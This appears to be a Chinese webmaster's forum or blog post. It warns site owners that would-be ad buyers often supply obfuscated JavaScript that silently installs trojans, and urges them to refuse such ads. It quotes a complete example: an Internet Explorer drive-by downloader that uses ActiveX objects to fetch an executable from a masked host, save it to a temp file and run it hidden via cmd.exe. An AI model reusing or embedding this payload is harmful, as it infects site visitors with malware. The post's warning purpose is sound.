最近我的站流量还可以,所以去几个站上发了 广告为求租的,过来联系的人都有很多,都有N个。但是谈到最近心里确实有点悲哀。 基本都是假惺惺的 说过来收广告,但是分析了下代码基本都是里面有自动下载木马的。一般如果不仔细查找的话不会发现。 因为现在木马一般做的比较隐蔽,都是免杀的。
他们的广告代码都是通过 js里面套js,而且js都是经过 压缩 加密的,现在可以八九不离十的是,如果里面发现有加密的 js,请坚决不要接了,如果你看着这个钱眼红,而出卖全国的网民和出卖自己的良心,可以“心安理得”的去那些收流量的,而且那个价格比假猩猩的来包月的高好几倍到十几倍。但是要知道,赚的这个钱是 “黑钱”。
下面有个例子,网址给隐藏了。
function GnMs(n)
{
var numberMs = Math.random()*n;
xxxfdfef='fdsafweqfsafwqefqewfasdf';
return '~Temp'+Math.round(numberMs)+'.tmp';
}
try
{
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
var Bf=document.createElement("object");
Bf.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var Kx=Bf.CreateObject("Microsoft.X"+"MLHTTP","");
var AS=Bf.CreateObject("Adodb.Stream","");
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
AS.type=1;
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
Kx.open("GET", 'http://xxxxxxxxxxxxxxxx.vc/s.exe',0);
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
Kx.send();
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
Ns1=GnMs(9999);
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
var cF=Bf.CreateObject("Scripting.FileSystemObject","");
var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);
AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Application","");
ok1=cF.BuildPath(NsTmp+'\system32','cmd.exe');
q.ShELLExecute(ok1,' /c '+Ns1,"","open",0);
b5fsdafsawfsf='fdsafeqaesfweqfeasff';
}
catch(adfwefasdf) { adfwefasdf=1; }
看下 这个就知道了,其他就不用多说了。。。一句话,君子爱财,取之有道。